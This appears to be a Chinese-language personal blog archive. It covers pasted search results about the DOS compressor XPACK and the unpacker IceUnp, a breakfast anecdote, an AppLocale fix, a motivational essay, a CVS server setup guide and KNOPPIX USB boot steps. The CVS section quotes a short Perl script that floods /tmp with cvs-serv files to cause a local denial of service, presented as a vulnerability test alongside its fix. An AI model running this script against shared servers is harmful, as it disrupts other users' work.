# google 找到的 xpack --------------------------------------------------------

http://www.google.com.tw/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2005-14,GGLD:en&q=xpack+jauming

Aaron's hOMEpAGE ... XPA v1.4.3 56KB. XPACK v1.67.m 145KB XPACK v1.67.n 39KB XPACK v1.67.r 36KB. PkSmart v1.0b 30KB. ... Inbuild Encryption v1.0 - COM encryptor, by Christoph 6KB. JMCE v0.7r JMCE v0.7p - JMCryptExe, by JauMing Tseng 4KB JMCryptExe v0.7n - EXE protection ...
exetools.com/old-page/packers.htm - 35k - 補充資料 - 頁庫存檔 - 類似網頁

最新更新... 【加密軟件】. 新增. SAFEEXEC - CRYPTCOM + LOCKEXE + COM2EXE. 99年12月2日. 【加密軟件】. 新增. XPACK v1.67.r by JauMing Tseng. 【解密軟件】. 新增, FileInfo v2.10 - a good Identifier, by Michael Hering. 99年12月1日. 【加密軟件】. 新增, Shadow ...
exetools.com/old-page/9912.htm - 23k - 補充資料 - 頁庫存檔 - 類似網頁

Interrupt list - text/2104.html INT 21 - XPACK v1.52+ - UNINSTALL AX = 37A1h BX = 6A6Dh ('jm') Return: AX = status 0000h successful FFFFh failed Program: XPACK is a transparent file compressor/decompressor by JauMing Tseng SeeAlso: AX=37A0h/BX=6A6Dh ...
poli.cs.vsb.cz/misc/rbint/text/2104.html - 35k - 頁庫存檔 - 類似網頁

Documentation of GetTyp XPack 1.0j, JauMing Tseng. XPack 1.0m - 1.20, JauMing Tseng. XPack 1.29 - 1.30, JauMing Tseng. XPack 1.31 - 1.66, JauMing Tseng ... XPack 1.65b2, JauMing Tseng. XPack 1.65b3/b4, JauMing Tseng. XPack 1.66, JauMing Tseng ...
www.unet.univie.ac.at/~a9606653/gettyp/gt.htm - 111k - 頁庫存檔 - 類似網頁

EddyHawk's Info List --- FILE (ARCHIVER/(DE)COMPRESSOR): --- Some ... ... XPACK -A by: JauMing Tseng (Taiwan) type: archiver V1.67.r [Oct 1999] note: depres is slower than pres -XPACK -PD by: JauMing Tseng (Taiwan) type: data presor V1.67.r [Oct 1999] -xpa32 by: jauming tseng type: win32 V1.0.2 [1999] -HYPER by: ...
web.textfiles.com/computers/EDDYHAWK/archiver2.txt - 34k - 補充資料 - 頁庫存檔 - 類似網頁

Interrupts Program: XPACK is a transparent file compressor/decompressor by JauMing Tseng. See Also: AX=37A1h/BX=6A6Dh - AX=37A3h/BX=6A6Dh. Category: File/Disk Compression - Int 21h - X. Int 21/AX=37A1h/BX=6A6Dh. XPACK v1.52+ - UNINSTALL ...
hdebruijn.soo.dto.tudelft.nl/ newpage/interupt/out-2700.htm - 122k - 頁庫存檔 - 類似網頁

#

Canal Software Downloads › Utilities/Drivers/System Files › ... ... Released: Jun 14, 1998, OS: MS-DOS, License: Shareware, Price: -, User Rating: N/A. * Pack Floppy Diskette to Compressed Diskette Image File * XPACK Online Decompression System (TSR) for XPACKed data files ... Shareware. www.canalsw.com/ category.php%5Bid%5D104%5BSiteID%5Dcanalsoftware?PHPSESSID=8e446cfbfda14050199de4e74babc080 - 49k - 補充資料 - 頁庫存檔 - 類似網頁

GRATIS - a guide to free software and services XPACK weighs only 45671 bytes and can be found at: http://www.simtel.net/pub/simtelnet/msdos/execomp/xpack145.zip ftp://ftp.simtel.net/pub/simtelnet/msdos/execomp/xpack145.zip Author: JauMing Tseng, Dep. of Computer Science and Info. ...
ces.iisc.ernet.in/hpg/envis/valdoc722.html - 18k - 頁庫存檔 - 類似網頁

2137A0BX6A6D ... XPACK v1.52+ - TSR INSTALLATION CHECK AX = 37A0h BX = 6A6Dh ('jm') Return: AL = FFh if not present as TSR (default return value from DOS) AX = 0000h if installed as a TSR CX = 6A6Dh ('jm') DX = version ID (0152h) Program: XPACK is a transparent ...
www.delorie.com/djgpp/doc/rbinter/id/66/27.html - 3k - 補充資料 - 頁庫存檔 - 類似網頁

SafeSite - Utilities/Drivers/System Files › Compress EXE and COM ... Pack Floppy Diskette to Compressed Diskette Image File * XPACK Online Decompression System (TSR) for XPACKed data files * Supports ... Shareware. author. JauMing Tseng ------------------------------ ...
www.safesite.com/category. php%5Bid%5D104%5BSiteID%5Ddigibuy - 41k - 頁庫存檔 - 類似網頁

Links-Seite von Jürgen Peters ... ASPack, PE packer: http://www.entechtaiwan.com/aspack.htm. Neolite, PE packer: http://www.neoworx.com/neolite. XPack, executable compressor: . WWPack home page: http://www.webmedia.pl/wwpack32/wwpack ...
private.addcom.de/gray/links_e.htm - 16k - 補充資料 - 頁庫存檔 - 類似網頁

DPMI32 für Virtual Pascal Die Verwendung zusammen mit dem WDos/X-Extender kann zu Problemen führen; XPack (xe) von JauMing Tseng(funktioniert zur Zeit nicht) XPack verwendet die aPLib Kompressionsbibliothek; außerdem haben fast alle DOS-Extender ihre eigene ...
kannegieser.net/~veit/vpascal/dpmi32_d.htm - 21k - 頁庫存檔 - 類似網頁

xpa167m.zip - Free Downloads at Simtel.net XPACK Online Decompression System (TSR) for XPACKed data files * Supports Microsoft 3 1/2' High-Density DMF-format ... Changes: . xpa167m.zip has replaced xpa167l.zip. Shareware. author. JauMing Tseng ...
www.simtel.net/ product.php%5Bid%5D2918%5Bcid%5D104%5BSiteID%5Dsimtel.net - 31k - 頁庫存檔 - 類似網頁

#

Computerworld - Utilities/Drivers/System Files › Compress EXE ... * Pack Floppy Diskette to Compressed Diskette Image File
* XPACK Online Decompression System (TSR) for XPACKed data files
* Supports Microsoft 3 1/2' High-Density DMF ... JauMing Tseng

downloads.computerworld.com/ product.php%5Bid%5D2918%5Bcid%5D104%5BSiteID%5Dcomputerworld?PHPSESSID=90e117... - 33k - 補充資料 - 頁庫存檔 - 類似網頁

MSDOS » Archivers » Compressors Author:, JauMing Tseng. . Download:, xpa167m.zip (Jun 14 1998, 144.4K). Description:, * Pack (Compress) COM/EXE/SYS & Still Executable * Pack Floppy Diskette to Compressed Diskette Image File * XPACK Online ...
www.bookcase.com/library/ software/msdos.archive.compress.html - 19k - 頁庫存檔 - 類似網頁

Chicago Sun-Times - Utilities/Drivers/System Files › Compress EXE ... XPACK Online Decompression System (TSR) for XPACKed data Files * Supports Microsoft 3 1/2' High-Density DMF-format ... Changes: . xpa167m.zip has replaced xpa167l.zip. Shareware. downloads.suntimes.com/product. php%5Bid%5D2918%5BSiteID%5Dsuntimes - 31k - 補充資料 - 頁庫存檔 - 類似網頁

Gem List... Warezak (awarezak@krysia.uni.lodz.pl) v3.04 Shareware DOS No X1 Aug '95 Stig Valentini (sv@id.dtu.dk) v0.94c Freeware DOS,OS/2 Yes XPACK Mar '96 JauMing Tseng (s8203143@simon.pu.edu.tw) v1.30 Freeware DOS Yes YAC Sep '95 Aleksandras ...
bbs.jnu.edu.cn/gem_browse.php?path=/groups/ GROUP_2/Newsoftware/compress/act&board=Newsoftware&type=* - 59k - 補充資料 - 頁庫存檔 - 類似網頁

Utilities/Drivers/System Files / Compress EXE and COM Files to ... XPACK Online Decompression System (TSR) for XPACKed data Files * Supports Microsoft 3 1/2%027 High-Density DMF-format ... Changes: . xpa167m.zip has replaced xpa167l.zip. Shareware. author. JauMing Tseng ...
soft.light-cat.com/?cat=287 - 28k - 補充資料 - 頁庫存檔 - 類似網頁

2137A1BX6A6D INT 21 - XPACK v1.52+ - UNINSTALL AX = 37A1h BX = 6A6Dh ('jm') Return: AX = status 0000h successful FFFFh failed Program: XPACK is a transparent file compressor/decompressor by JauMing Tseng SeeAlso: AX=37A0h/BX=6A6Dh.
www.delorie.com/djgpp/doc/rbinter/id/67/27.html - 2k - 補充資料 - 頁庫存檔 - 類似網頁
#

Formats of archives, currently supported by my utilities TSCOMP, 1.3.21, The Stirling Group. UFA, 0.03-0.04b1, Igor Pavlov · WAVARC, 1.0, Dennis Lee · X1, 0.95a beta, Stig Valentini · Xpack, 1.67m,1.67n, JauMing Tseng · YAC, 1.02, Alexandras Surna · Zip-Archiv, 2.0, Troxler Peter ...
www.geocities.com/lyapko/formats.htm - 17k - 頁庫存檔 - 類似網頁

TC2 author. JauMing Tseng. s8203143@simon.pu.edu.tw. http://140.128.9.3/~s8203143/XPACK.html. http://www.pu.edu.tw/~s8203143/XPACK.html. http://www1.pu.edu.tw/~s8203143/XPACK.html. ------------------------------ ...
www.xs4all.nl/~cklpcc/TC2.htm - 78k - 補充資料 - 頁庫存檔 - 類似網頁

-=- LINKS -=- ... Marcus Winter, Germany, download, 20to4 v1.0b. JauMing Tseng, Taiwan, download, X-pack v1.67r2. Zenix Yang, Taiwan, download, FSE v0.76. ... Bit-Arts Soft, UK, download, Crunch V4, Softlocx V6 & ++. Useful stuff. G UW32 v1.08 - get it and love it ...
www-user.tu-cottbus.de/~herinmi/LINKS.HTM - 36k - 補充資料 - 頁庫存檔 - 類似網頁

The GIFfer's File Warehouse ... Files: 6 New: 8-17-1995 Old: 8-14-1995. XARC50.ZIP, 11/92, 12k, XARC 5.0 ARC'ing utility. XPACK149.ZIP, 11/96, 55k, XPACK is a Powerful Freeware Compressor that. CRC-verified .EXE files. ... ALWAYS* smaller than DiskDupe, TeleDisk and. author: JauMing ...
www.giffer.com/public/dos/parch/arch0017.htm - 6k - 補充資料 - 頁庫存檔 - 類似網頁

Filearea Nr 0002 - AKI Computer FTP-Server XPACK now allows a compressed diskette image to be created for electronic transmission. author: JauMing Tseng internet email: s8203143@simon.pu.edu.tw) Optimized by http://www.xs4all.nl/~feldmann ...
www.aki.ipme.de/htmpages/0002_02.HTM - 43k - 頁庫存檔 - 類似網頁

Interrupt List, part 6 of 18 Copyright (c) 1989-1999,2000 Ralf ... ... by JauMing Tseng SeeAlso: AX=37A0h/BX=6A6Dh --------k-2137A2BX6A6D----------------------- INT 21 - XPACK v1.52+ - GET ... of temporary directory Program: XPACK is a transparent file compressor/decompressor by JauMing Tseng SeeAlso: ...
oopweb.com/Assembly/Documents/ InterList/Volume/INTERRUP.F - 273k - 頁庫存檔 - 類似網頁

Linki COM/EXE/DLL-pakerov ... v1.20 Shareware Win9x EXE,DLL XE Yanv '00 Sergey Belyakov & Co v1.4.5 Freeware DOS COM,EXE,SYS XPack Iyul' '97 JauMing Tseng v1.67m Freeware DOS COM,EXE,SYS 32Lite Iyun' '99 Joergen Ibsen & Oleg Prokhorov v0.02d Nekommerch. ...
www-lat.compression.ru/arctest/links-exe.htm - 39k - 頁庫存檔 - 類似網頁

Freeware / Shareware Jauming Tseng [XPAck] · Julian Seward [bzip2] · [LHA] · Markus Oberhumer [LZO, LZOP, NRV, UCL, UPX] · Markus Oberhumer & Laszlo Molnar [UPX] · Mercury Soft Technology Incorporated [MSXiE] · Micco [LHMelt, UNARJ32.DLL, UNLHA32.DLL] ...
sunflower.singnet.com.sg/~chiaky/SHARE.HTM - 26k - 補充資料 - 頁庫存檔 - 類似網頁

PCMag.com Shareware Library: Utilities/Drivers/System Files ... Pack Floppy Diskette to Compressed Diskette Image File * XPACK Online Decompression System (TSR) for XPACKed data Files * Supports ... Shareware. ------------------------------ ...
shareware.pcmag.com/ category.php%5Bid%5D104%5BSiteID%5Dpcmag?PHPSESSID=f2bb3825610a9d5e7bbb4261fc6b7e5b - 69k - 補充資料 - 頁庫存檔 - 類似網頁

#

xpa167m.zip - Review & Free Download Pack Floppy Diskette to Compressed Diskette Image File * XPACK Online Decompression System (TSR) for XPACKed data Files * Supports ... Company name : JauMing Tseng. Company URL :. Program version :. Program release date : 1998-06-14 ...
www.softrepository.com/.../ Compress-EXE-and-COM-files-to-save-disk-space/xpa167m-zip.html - 26k - 補充資料 - 頁庫存檔 - 類似網頁

V～Z 形式に関して XPACKと言うアーカイバの独自形式のようです。圧縮率はLHA形式付近です。但し、手持ちに資料がなく詳細は不明です。 [その他] ... http://members.nbci.com/jauming/. 【. 機能. 】圧縮・解凍. 【. SPEC. 】 Wn32-C、???、LFN可 ...
www.nemu.to/Beta/arc_vz.html - 類似網頁

Über IDArc ---------- IDArc ist ein einfaches Tool zum ... XPack-Diskimage 89. ARQ 90. ACE 91. Squash 92. Terse 93. XPack Single Data 94. Stuffit (Mac) 95. PUCrunch 96. ... 1.56.03 29.09.99 - Format XPA32 (Jauming Tseng) wird Erkannt. 1.56.04 02.10.99 - BA-Erkennung verbessert (einige Win-Sfxes ...
private.addcom.de/gray/idarc.txt - 14k - 補充資料 - 頁庫存檔 - 類似網頁

(真實故事系列2之：蛋餅加蛋篇)

2006-02-17T19:45:00.000-08:00

(真實故事系列2之：蛋餅加蛋篇)

話說今天早上我在家裡附近的永和豆漿買早餐吃

買的是飯團及米漿

老闆就問我飯團要不要加蛋,我說不要

這時旁邊出現一個路人甲也要買早餐

老闆問路人甲要買什麼,

路人甲說：『蛋餅加蛋』

老闆說：『蛋餅本身就有加蛋阿』

路人甲說：『那我要蛋餅就好了…』

(也許他很喜歡吃蛋吧？… 囧rz , 要是點蛋餅不加蛋就酷了@@)

iceunp 的由來

2006-02-10T21:02:00.000-08:00

iceunp 的由來

dos 時代有很多壓縮可執行檔的工具程式,早期比較有名的如法國的lzexe與美國的pklite,

當時還在大學唸書的我,有一次在email 收到一個屬名 "Prince Of Sadness ",他希望我用他的ICE/COS引擎寫一個dos可執行檔的解壓縮(脫殼)工具,(奇怪的是他怎麼會找到我? 又怎麼知道我寫得出來?為什麼不自己寫呢?@@)

懶懶的我就

拿法國Frank Zago的IUP作為使用者介面的外殼(IUP的引擎是使用x86的int1作為trace工具,並不同於軟體模擬的ICE/COS引擎),

加上ICE/COS引擎,以及一部份德國teu的exedump function完成了iceunp,

也在trace 引擎內加入一些 [保護加殼工具] 的偵測及破解程序

後來不再maintain 就把source 公開了

--分隔線--以下是google 找到的Prince Of Sadness [Immortal Riot/Genesis]. --

http://www.google.com.tw/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2005-14,GGLD:en&q=Prince+Of+Sadness+%5BImmortal+Riot%2FGenesis%5D

Methyl 'Tunneling Document #4 (Development of Emulation Systems ...
... and how emulation technology used in AV software will cope with it and other
virus technologies. Looks like this is going to be another interesting year of
documents. Prince Of Sadness [Immortal Riot/Genesis]. [Back to index] ...
vx.netlux.org/lib/vme01.html - 155k - 頁庫存檔 - 類似網頁

Tutorials - Development of Emulation Systems
ICE and COS are (c) 1997 PRINCE of SADNESS and may be modified as long as the
base code of the modified system is acknowledged, and the copyright status of
said base system be stated. ICE and COS may be used, as long as the copyright ...
65.98.58.155/lib/static/vdat/tuss0004.htm - 161k - 補充資料 - 頁庫存檔 - 類似網頁

--分隔線--以下是google 找到的iceunp ------------------------------------------------------

http://www.google.com.tw/search?hl=zh-TW&rls=GGLD%2CGGLD%3A2005-14%2CGGLD%3Aen&q=iceunp&meta=

INSIDER - FAQ Edition #3 UNComplete by Christoph Gabler Release ...
... hlt lamer db " Only lamers do it this way.$" ÖÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ· º Cheap
IceUnp detection º º by Christoph Gabler º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼ ¯¯ IceUnp
uses good trace modes but the coder forgot one really dumb thing : His ...
fravia.2113.ch/protec/insi_faq.txt - 39k - 補充資料 - 頁庫存檔 - 類似網頁

ICEUNP--檔案管理--加密/解密--eNet中文軟體免費下載站

ICEUNP，免費軟體，download.enet.com.cn/html/070532000072721.html - 49k - 2006年2月8日 - 頁庫存檔 - 類似網頁

INSIDER - FAQ Edition #3 UNComplete by Christoph Gabler Release ...
Get a REAL IceUnp detection in the UNcovered version of INSIDER.FAQ ! ¯¯ mov
ah,4Eh ; Find the first match lea ... Iceunp/TR can be kicked with modification.
Mostly incompatible with QEMM. CR2 = Should not be modified, crashs on Cyrix. ...
www.searchlores.org/protec/insi_faq.txt - 41k - 頁庫存檔 - 類似網頁

Aaron's hOMEpAGE
... by Hendrix 52KB CUP386 v3.4 nice generic unpacker 50KB iCEuNP v0.3.4 - exe/com unpacker,
by JauMing Tseng 36KB IceUnp v0.3.3 asm source included, by JauMing Tseng 43KB IceUnp
v0.3.0 exe-unpacker by the author of xPack 11KB IceUnp v0.1.5 14KB ...
exetools.com/old-page/decrypt.htm - 45k - 補充資料 - 頁庫存檔 - 類似網頁

INSIDER - FAQ Edition #3 UNComplete by Christoph Gabler Release ...
get a real IceUnp Detection in The uncovered version of INSIDER.FAQ ! ¯¯ mov
ah,4Eh ; find The first match lea ... IceUnp/TR can be kicked with modification.
mostly incompatible with QEMM. CR2 = should not be modified, crashs on Cyrix. ...
www.tor.at/resources/computer/net/internet/ www/search/www.searchlores.org/protec/insi_faq.txt - 41k - 補充資料 - 頁庫存檔 - 類似網頁

CookieCrK
... DeGlucker 0.4, asm, 97,5 KB, Debugger dla DOS z kodem źródłowym w asm. iCEuNP
0.3.4, asm, 129 KB, Intel Complex Emulator exe/com UNPacker (freeware) kod źródłowy...
(iCEuNP, Kevin Executable file kit, X-pack for Executable ). TDHack 1.42, asm ...
62.233.216.194/index.php?show=sources - 38k - 補充資料 - 頁庫存檔 - 類似網頁

шшшшшщ шшш шъъш шъъш чщ ш чш шээш ш ш чщ ш ш ш ш шъъъ чщ ш ш ш ш ш ...
Even more Anti Iceunp code added. - Anti TR 2.02 - 2.05 added. - Improved entrypoint
emulation added. ... B0 Ш CUP386 3.4 Ш IceUnp 0.2.9 Ш AUP386 1.0 Ш IUP 0.6.4 Ш
UNP (-T) Ш XO (-C) Ш TR 2.05 Ш SoftIce Ш WinIce Ш Deglucker 0.04rc Ш ...
web.textfiles.com/software/trap.txt - 13k - 頁庫存檔 - 類似網頁

EddyHawk's Info List --- Executable Processor Review (ProsInfo) ...
... lab = laboratory min = minimum max = maximum mbr = master boot record mem = memory
mte = MuTation Engine orig = original ovl = overlay PIC = Programmable Interrupt
Controllers PIQ = Prefetch Instruction Queue PM = protected mode popunpak = ...
web.textfiles.com/computers/EDDYHAWK/prosinfo.txt - 101k - 補充資料 - 頁庫存檔 - 類似網頁
[ web.textfiles.com 的其它相關資訊 ]

VienenBox BBS
... I030.RAR, 9k, 12/11/98, IceUnP v0.3.0 - EXE/COM UnPacker by author of Xpack.
I031.RAR, 9k, 06/26/99, IceUnP v0.3.1 - EXE/COM UnPacker by author of Xpack.
I033.RAR, 36k, 11/08/99, IceUnP v0.3.3 - EXE/COM UnPacker by author of Xpack. I034. ...
www.vienenbox.de/filebase/TGMPACK.DOS/index.htm - 101k - 補充資料 - 頁庫存檔 - 類似網頁

SAC
1. i034.zip, IceUnP v0.3.4 - EXE/COM UnPacker by author of Xpack, 133154, 2000-01-14
00:00:00. 2. i5comp21.rar, I5comp v2.01 - Install Shield Cabinet Files Maintenance
Util, 97067, 1999-12-02 00:00:00 ...
www.sac.sk/files.php?d=7&l=I - 9k - 頁庫存檔 - 類似網頁

AppLocale與msi 亂碼解決法

2006-01-26T03:15:00.000-08:00

AppLocale與msi 亂碼解決法

Microsoft AppLocale, 出名的切換語系工具，不過它有很多問題，包括你裝了後 MSI Installer 都會用上次設定的語系跑等等。
※發現，使用過 AppLocale 後，"C:WINDOWSAppPatch" 這個資料夾可能會出現 "AppLoc.tmp" 這個檔案。此檔案可能會造成 "Windows Installer" 運作錯誤，不但安裝程式的畫面變成亂碼，還會隨著安裝程序，把亂碼帶入 Registry，造成許多問題。這應該算是 AppLocale 的 Bug 吧，請網友注意。

終於知道問題出在哪裡了

因為安裝了Microsoft AppLocale這個軟體..本來可以利用這軟體來執行其他語系軟體，但也會因此而讓一些軟體跑出亂碼

解決方案：
1. 將Microsoft AppLocale移除即可
2.嘗試把apploc.tmp內的資料全給刪除save後才轉做唯讀吧
這麼一來會受影響的程式就不能再依據apploc.tmp內的語系資料變成該語系

人生～該是「進步+ing」

2005-12-29T23:11:00.000-08:00

人生～該是「進步+ing」

學習是生命中最重要的一件事...
只要不放棄自我，人生路上會是精彩的～

人生，不一定要當「最好」，但一定要懂得讓自己「更好」;
不一定要登峰造極，但一定要懂得讓自己保持在進步的狀態中。

曾經聽過有一位老太太，在她六十八歲的生日派對上如此許願著：「我40歲
學彈鋼琴 (現在她老人家已可以在教會中彈琴)，50歲學英文 (她已可以用英文與

外國人對話)，60歲學開車。現在我已經六十八歲了! 如果上帝讓我活到七十歲，

我一定要開畫展。」

多麼讓人佩服的態度，不是嗎?

人生，該是「進步 + ing」(現在進行式)，而不應是「進步 + ed」(過
去式) 或「be going to + 進步」 (未來式)；該是把握現在，懂得不時地保持在上

進狀態，絕不因時間或任何的關係而停止努力，或是一再地告訴自己「反正明天
再開始也不遲」。

想一想，如果一位六十八歲的老太太都可以如此上進，那您呢?
您是一個懂得讓自己不斷進步的人嗎?

在此提供您兩個小小的妙方:

● 每天去做一件自己雖不喜歡，但卻有意義的事 ●

每天做十分鐘的運動，每天背十個英文單字，每天讀一小段最新的商業期
刊，每天饒恕一個自己不喜歡的人。這些事也許您不喜歡，但卻很有意義! 不用太

久，您的身體、知識、修養、專業能力 ....，必會有迅速驚人的進步。

● 常把目標給設定在比自己現有能力---再多出10%的地方 ●

做一件事時，除非事關重大，否則在此誠摯地建議，不妨試著把目標給設定
在比自己現有能力再多出10%的地方。

也許一開始會累一些，但久而久之，您的能力就會被多「練」出10%，習慣這

樣的程度後，再把標準提高10% ....，長期累積，您將在不知不覺中，變成一個
巨人 !

一個懂的不斷更新、上進的人，不但令人欽佩，也會在這蕭條的年代裡，較
不易面臨被不景氣給淘汰的壓力。

您的人生，會是「進步 + ing」嗎? 昨天的您、今天的您、明天的您，三者

能連成一條向上攀升的曲線嗎？值得共勉之！

** 斧頭雖小，但多劈幾次，就能將堅硬的樹木伐倒 ** 莎士比亞

Redhat7.0下CVS server 及webcvs配置

2005-08-16T18:49:00.000-07:00

Redhat7.0下CVS server 及webcvs配置
文章屬性：整理
文章來源：個人實踐及linxforum.net的貼子

配置CVS server,，其中引用其他作者的文字我用[/c&v]... [c&v/]指出了

我的系統為Redhat 7.0，運行Apache

1.CVS Server配置

RHLinux# mount /mnt/cdrom (如果不好用的話，你可以試一下mount -t iso9669 /dev/cdrom /mnt/cdrom)

RHLinux# cd /mnt/cdrom/Redhat/RPM (不用解釋了吧)

RHLinux# rpm -ivh cvs-1.10.8.8.i386.rpm (安裝cvs,你可以用rpm -qpl ...看安裝的詳細資訊)

RHLinux# vi /etc/service
(應該有
cvspserver 2401/tcp # cvs client/server operations
cvspserver 2401/udp # cvs client/server operations
這兩行)

要使cvs正常運行還需要對需要使用cvs的用戶進行設置，下面是我在
配置cvs使用的方法。首先建立一個用戶組cvs,可以使用groupadd或者
addgroup命名，也可以直接編輯/etc/group檔添加這個組，然後添加
一個用戶cvsroot，然後修改/etc/passwd檔使cvsroot用戶組
是cvs組，而不是cvsroot組。建立/cvsroot目錄，然後修改/home/cvsroot的
屬主及屬性[c&v/])
RHLinux# groupadd cvs
RHLinux# adduser cvsroot
RHLinux# passwd cvsroot

修改/cvsroot的屬主及屬性
RHLinux# chown cvsroot.cvs /home/cvsroot
RHLinux# chmod 755 /home/cvsroot（原本應該是771，但是我們要配置cvsweb.cgi，下面再談）。

---------------------------------------------------------------------------------------------------
RHLinux# cd /etc/xinetd.d

RHLinux# vi cvspserver(創建一個新檔，檔案名隨意,注釋為檔內容)
/*********************分隔線***************************

Multi-User

指定一個群組給需要使用 cvs 的使用者, 假設為該群組叫 cvs
groupadd cvs
10.將要使用 cvs 的使用者加入該群組, 編輯 /etc/group 或使用 userconf
cvs:x:GID:user1,user2,user3
11.將 CVSROOT 設為該群組, 讓使用者能新增專案
chgrp -R cvs /home/cvs
chmod ug+rwx /home/cvs/CVSROOT

----------------------------------------------------------------------------------------------

# (service後面的名稱一定要和你在/etc/service檔中的cvs服務名稱
# 一樣,但是我不知道/etc/service檔中的cvs服務名稱可以改否，rpm
# 方式安裝完後，那兩行就在那了)

# (multi: --allow-root )
service cvspserver

{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/bin/cvs
server_args = --allow-root=/home/cvsroot --allow-root=/backb pserver
log_on_failure += USERID
}

**************分隔線**********************************/

RHLinux# cvs -d /home/cvsroot init
(對cvs進行初始化,你會發現/home/cvsroot下多了一個CVSROOT的子目錄)

RHLinux# /etc/init.d/xinetd restart (重新啟動xinetd)
cvs -d :pserver:cvsroot@host:/home/cvsroot login
(輸入cvsroot用戶在伺服器上的口令，沒有出現錯誤提示就表示成功了.)

(如果cvspserver成功起動後，netstat -l | grep tcp應能看到以下行：
tcp 0 0 *:cvspserver *:* LISTEN)

2.WinCvs(Windows下用戶端的配置):
[/c&v] 啟動wincvs在Admin功能表中選擇preferences然後在global頁中設置CVSROOT，就是

:pserver:cvsroot@host:/cvsroot。在認證方式中選擇passwd file on the cvs server，
在下面的版本號中選擇合適的版本，執行Admin功能表中的login，在提示框輸入口令，如果
Output視窗出現以下提示：
*****CVS exited normally with code 0*****
就表示我們現在可以在Windows下使用cvs服務了。[c&v/]

如何使用wincvs把自己的專案加到cvs中去

1) Make sure that all the source files you want to check into CVS are on one directory (or

subdirectories). This directory (folder) should NOT contain anything else! That is, it should not

contain executables, object files (.o), class files (.class), etc. It should only contain the

source files.

1) 確認你想加入的原始檔案全部在一個目錄下。這個目錄僅僅應當包含原始檔案，不應該有其他任何的可執行體、
*.O,*.class....等類型的文件
2) 在wincvs "Modules"窗口中包含你的原始檔案的目錄被選中
3) 在功能表"Create" ->"Import Module"選擇目錄，把它導入CVS
4) 重命名你的目錄
5) 其他相關的內容請看wincvs文檔

cvsweb配置

[/c&v]cvsweb是一個perl程式，現在的版本是1.93，記得要用新版，1.8以下有一個小小的漏洞，可以到綠盟查

一查。
由於是cgi程式，是以nobody用戶執行的，所以/cvsroot的屬性要設成775。開始我按章照搬，把屬性改成
771，結果專案的目錄就是不出來，埋葬了半天的青春：（還有記得把/cvsroot/CVSROOT/history的屬性
改成666。cvsweb.conf裏%CVSROOT陣列的Configuration設成/cvsroot，就是cvs倉庫的路徑不要那個長長
CVSROOT變數。這些其實在它的說明文檔和程式注釋裏都講到了，只是這個世界是懶人的世界：）

一切都陽春白雪，可以埋頭寫程式了？只是cvs還有一個小小的DoS漏洞要跟大家說一下：（
每個cvs的操作過程會以操作用戶的身份在/tmp下臨時建一個鎖定了的目錄cvs_servPID，這時如果有人建
了大量的同類檔就會使cvs的操作出錯，會提示：
cannot change permissions on temporary directory
Operation not permitted
下面是測試的perl程式：
#!/usr/bin/perl
#$min和$max的值根據實際情況修改
$min=400;
$max=4000;
for ($x=$min;$x<=$max;$x++) {
open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!";
chmod 0600, "/tmp/cvs-serv$x";
close CVSTMP;
}

解決方法：
使用server.c中的mktemp(3)函數或者其他任何可以產生唯一檔案名的方法。在/tmp/目錄所在的分區使
用空間配額也能解決部分問題。主要還是紮緊籬笆，莫讓別人闖進來，這畢竟是一個local的問題。
[c&v/]

RHLinux# rpm -ivh cvsweb-1.79-3.noarch.rpm(顧不了那麼多了，饑不擇食嘛)

RHLinux# cp /home/httpd/cvsweb.cgi /var/www/cgi-bin

RHLinux# cd /etc/httpd/conf
RHLinux# vi cvsweb.conf
/************************************************************************
找到%CVSROOT項
更改其子項 'Configuration'=>'/home/cvsroot',
*************************************************************************/
在流覽器中敲入http://RHLinux/cgi-bin/cvsweb.cgi如果出現CVS Repository頁面也不要高興的太早
繼續進入下一級頁面，如果出錯，那麼
RHLinux# rlog (如果shell提示沒有這個命令的話,找這個檔rcs-xx.-xx.i386.rpm)

RHLinux# rpm -ivh rcs.........

(OK了嗎？沒有？那你自己再找找原因吧，我沒碰到過這種問題)

hinet 新聞台

2005-05-07T22:47:00.000-07:00

hinet 新聞台

http://weblive.hichannel.hinet.net/web/stchannel.jsp?cid=28

Boot KNOPPIX from an USB Memory Stick

2005-05-05T22:12:00.000-07:00

Boot KNOPPIX from an USB Memory Stick

: 把 KNOPPIX 塞在 USB 隨身碟帶著走
測試報告
配備pretec 128 cf card + cf 讀卡機
步驟
1.先下載
http://rz-obrian.rz.uni-karlsruhe.de/knoppix-usb/damnsmall-0.3.6-usb.tar
解開到cf卡
2.syslinux /dev/sda
3.in bios choose boot from USB-ZIP
enjoy!!
----------------------------------------------------------------

Boot KNOPPIX from an USB Memory Stick What you'll need:

Knoppix or an already stripped down version
USB Memory Stick
Computer capable of booting from USB
kernel with cloop-support
syslinux
Preparing everything:

I used Damn Small Linux for this (it's only 51MB and has fluxbox ;-), but every other stripped down Knoppix version should do (if you have enough space on your memory stick).
You can also strip down your own version of knoppix (see the Knoppix Customising FAQ).

Modifying miniroot.gz:

First you need to modify the boot-image (KNOPPIX/boot.img). Mount it (mount -o loop boot.img /mnt) and copy everything in a directory (e.g. ~/knoppix-usb/bootdisk). You need to modify linuxrc in miniroot.gz and put the relevant usb modules in modules/usb/.

Now use gunzip to uncompress miniroot.gz and then mount it (mount -o loop miniroot /mnt). Open linuxrc with your editor. You need to load the relevant usb-modules and make sure to sleep some time, because the modules need some time to recognize your USB Memory stick. I put the relevant parts before the scsi modules are loaded to make sure, that my USB Memory Stick will be /dev/sda: # load usb-modules first (so that memory-stick becomes /dev/sda1) # uncomment for USB 2.0 support (experimental) #insmod -f /modules/usb/ehci-hcd.o insmod -f /modules/usb/usbcore.o insmod -f /modules/usb/usb-uhci.o insmod -f /modules/usb/uhci.o insmod -f /modules/usb/usb-ohci.o insmod -f /modules/usb/usb-storage.o # need to sleep because it takes some time to register things ash -c "sleep 4"

Now you need to make sure, that your root-fs is mounted to /cdrom: I commented out the section in linuxrc where a CDROM is searched and put the following lines in: # mount /dev/sda1 (memorystick to cdrom) FOUND_KNOPPIX="/dev/sda1" mount -t vfat /dev/sda1 /cdrom

You can get my modified linuxrc here

